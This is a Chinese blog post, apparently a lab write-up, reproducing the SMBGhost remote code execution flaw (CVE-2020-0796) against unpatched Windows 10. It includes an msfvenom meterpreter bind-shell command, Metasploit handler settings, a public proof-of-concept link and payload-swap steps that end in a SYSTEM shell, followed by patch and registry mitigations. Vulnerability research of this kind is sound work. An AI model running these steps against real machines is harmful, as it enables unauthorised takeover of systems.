【漏洞复现】CVE-2020-0796 SMBGhost RCE exp复现过程

【漏洞复现】CVE-2020-0796 SMBGhost RCE exp复现过程

一、事件背景

2020年3月13日,收录了MicrosoftSMB协议远程代码执行漏洞(CVE-2020-0796)。该漏洞是由于SMBv3协议在处理恶意的压缩数据包时出错所造成的,它可让远程且未经身份验证的攻击者在目标系统上执行任意代码。近日,漏洞细节以及漏洞利用Exp已在互联网公开。

二、影响范围

Windows 10 1903版本(用于基于x32的系统)
Windows 10 1903版(用于基于x64的系统)
Windows 10 1903版(用于基于ARM64的系统)
Windows Server 1903版(服务器核心安装)
Windows 10 1909版本(用于基于x32的系统)
Windows 10版本1909(用于基于x64的系统)
Windows 10 1909版(用于基于ARM64的系统)
Windows Server版本1909(服务器核心安装)

三、漏洞复现

3.1 环境部署
环境 IP地址 用途
Win10 1903 192.168.80.130 目标机
Win10 1909 192.168.80.1 攻击机
Kali 2020 192.168.80.128 控制机
1. 目标机 Win10 1903
noteattachment1
未安装KB4551762补丁
noteattachment2
开启SMB文件共享
2. 在控制机kai 2020利用msf 生成后门
msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f py -o backdoor.py
noteattachment3
打开msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcpset
set rhost 192.168.80.130
Show options
noteattachment4

3 在攻击机Win10 1909 下载 exp
https://github.com/chompie1337/SMBGhost_RCE_PoC.git
noteattachment5
替换exploit.py 里的USER_PAYLOAD代码为backdoor.py中的buf代码
noteattachment6
noteattachment7

3.2 使用公开的exp 测试
  1. 目标机未关闭Windows 防火墙,未关闭defender
    noteattachment8
    noteattachment9
    提示[-] physical read primitive failed! 服务器蓝屏
    noteattachment10
  2. 目标机关闭Windows 防火墙和defender
    noteattachment11
    关闭 defender
    noteattachment12
    执行成功
    noteattachment13
    反弹shell
    noteattachment14
    system权限
    noteattachment15

四、修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2020-0796
另可采取下列临时防护措施:
个人用户也可通过手动修改注册表,运行regedit.exe,打开注册表编辑器,在HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters建立一个名为DisableCompression的DWORD,值为1,禁止SMB的压缩功能。

五、附录

参考

*https://github.com/chompie1337/SMBGhost_RCE_PoC.git


扫码关注公众号(SecurityCN) wechat
欢迎您扫码关注SecurityCN(微信公众号:securitycn),本号会发布一些个人学习及研究文章,包括但不限于漏洞分析、漏洞挖掘、代码审计、IOT安全、比赛、培训认证等
坚持原创技术分享,您的支持将鼓励我继续创作!